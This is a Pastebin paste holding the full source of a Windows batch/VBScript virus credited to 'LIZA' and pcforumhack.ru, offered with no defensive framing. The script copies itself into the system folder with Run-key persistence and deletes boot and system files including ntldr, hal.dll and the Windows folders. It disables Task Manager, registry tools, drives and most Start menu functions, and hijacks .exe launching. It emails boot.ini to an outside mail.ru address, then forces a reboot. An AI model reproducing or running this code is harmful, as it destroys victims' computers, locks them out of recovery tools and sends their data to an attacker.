API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 15th, 2019
144
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.96 KB | None | 0 0
raw download clone embed print report
  1. [USER=98981]@Echo[/USER] This virus created by LIZA
  2. [USER=98981]@Echo[/USER] Virus: pcforumhack.ru Virus
  3. [USER=98981]@Echo[/USER] Autor: LIZA
  4. [USER=98981]@Echo[/USER] off
  5. echo Chr(39)>%temp%\temp1.vbs
  6. echo Chr(39)>%temp%\temp2.vbs
  7. echo on error resume next > %temp%\temp.vbs
  8. echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs
  9. echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs
  10. reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
  11. copy %¶§% %SystemRoot%\user32dll.bat
  12. reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
  13. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
  14. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
  15. echo fso.deletefile "C:\ntldr",1 >> %temp%\temp.vbs
  16. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
  17. reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
  18. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
  19. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
  20. echo fso.deletefolder "D:\Windows",1 >> %temp%\temp.vbs
  21. echo fso.deletefolder "I:\Windows",1 >> %temp%\temp.vbs
  22. echo fso.deletefolder "C:\Windows",1 >> %temp%\temp.vbs
  23. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  24. echo fso.deletefile sr+"\system32\hal.dll",1 >> %temp%\temp.vbs
  25. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  26. echo fso.deletefolder sr+"\system32\dllcache",1 >> %temp%\temp.vbs
  27. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  28. echo fso.deletefolder sr+"\system32\drives",1 >> %temp%\temp.vbs
  29. echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru">>%temp%\temp.vbs
  30. echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru">>%temp%\temp.vbs
  31. echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru">>%temp%\temp.vbs
  32. echo on error resume next > %temp%\temp1.vbs
  33. echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp1.vbs
  34. echo do>>%temp%\temp1.vbs
  35. echo fso.getfile ("A:\")>>%temp%\temp1.vbs
  36. echo loop>>%temp%\temp1.vbs
  37. echo on error resume next > %temp%\temp2.vbs
  38. echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp2.vbs
  39. echo do>>%temp%\temp2.vbs
  40. echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%\temp2.vbs
  41. echo loop>>%temp%\temp2.vbs
  42. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
  43. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
  44. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  45. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
  46. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
  47. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
  48. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
  49. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
  50. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
  51. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
  52. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
  53. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
  54. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
  55. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
  56. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
  57. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
  58. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
  59. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
  60. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  61. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
  62. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
  63. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
  64. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
  65. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
  66. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
  67. echo set application=createobject("shell.application")>>%temp%\temp.vbs
  68. echo application.minimizeall>>%temp%\temp.vbs
  69. reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
  70. start rundll32 user32, SwapMouseButton
  71. reg add "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /f
  72. echo i=50 >> %temp%\temp.vbs
  73. echo while i^>0 or i^<0 >> %temp%\temp.vbs
  74. echo S.popup "forum.whack.ru",0, "forum.whack.ru",0+16 >> %temp%\temp.vbs
  75. echo i=i-1 >> %temp%\temp.vbs
  76. echo wend >> %temp%\temp.vbs
  77. echo do >> %temp%\temp.vbs
  78. echo wscript.sleep 200 >> %temp%\temp.vbs
  79. echo s.sendkeys"{capslock}" >> %temp%\temp.vbs
  80. echo wscript.sleep 200 >> %temp%\temp.vbs
  81. echo s.sendkeys"{numlock}" >> %temp%\temp.vbs
  82. echo wscript.sleep 200 >> %temp%\temp.vbs
  83. echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs
  84. echo loop>> %temp%\temp.vbs
  85. echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\temp.vbs
  86. echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs
  87. echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs
  88. echo For i = 0 to colCDROMs.Count - 1 >> %temp%\temp.vbs
  89. echo colCDROMs.Item(i).eject >> %temp%\temp.vbs
  90. echo next >> %temp%\temp.vbs
  91. echo End If >> %temp%\temp.vbs
  92. echo Call SendPost("smtp.mail.ru", "forum.whack.ru@mail.ru", "[EMAIL]support@mail.ru[/EMAIL]", "...", "Копм заражен!") >> %temp%\temp.vbs
  93. echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs
  94. echo Set iMsg = CreateObject("CDO.Message") >> %temp%\temp.vbs
  95. echo Set iConf = CreateObject("CDO.Configuration") >> %temp%\temp.vbs
  96. echo Set Flds = iConf.Fields >> %temp%\temp.vbs
  97. echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/sendusing[/URL]") = 2 >> %temp%\temp.vbs
  98. echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/smtpauthenticate[/URL]") = 1 >> %temp%\temp.vbs
  99. echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/sendusername[/URL]") = "support" >> %temp%\temp.vbs
  100. echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/sendpassword[/URL]") = "support" >> %temp%\temp.vbs
  101. echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/smtpserver[/URL]") = "smtp.mail.ru" >> %temp%\temp.vbs
  102. echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/smtpserverport[/URL]") = 25 >> %temp%\temp.vbs
  103. echo Flds.Update >> %temp%\temp.vbs
  104. echo iMsg.Configuration = iConf >> %temp%\temp.vbs
  105. echo iMsg.To = strTo >> %temp%\temp.vbs
  106. echo iMsg.From = strFrom >> %temp%\temp.vbs
  107. echo iMsg.Subject = strSubject >> %temp%\temp.vbs
  108. echo iMsg.TextBody = strBody >> %temp%\temp.vbs
  109. echo iMsg.AddAttachment "c:\boot.ini" >> %temp%\temp.vbs
  110. echo iMsg.Send >> %temp%\temp.vbs
  111. echo End Function >> %temp%\temp.vbs
  112. echo Set iMsg = Nothing >> %temp%\temp.vbs
  113. echo Set iConf = Nothing >> %temp%\temp.vbs
  114. echo Set Flds = Nothing >> %temp%\temp.vbs
  115.  
  116. echo s.run "shutdown -r -t 0 -c ""pcforumhack.ru"" -f",1 >> %temp%\temp.vbs
  117. start %temp%\temp.vbs
  118. start %temp%\temp1.vbs
  119. start %temp%\temp2.vbs
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!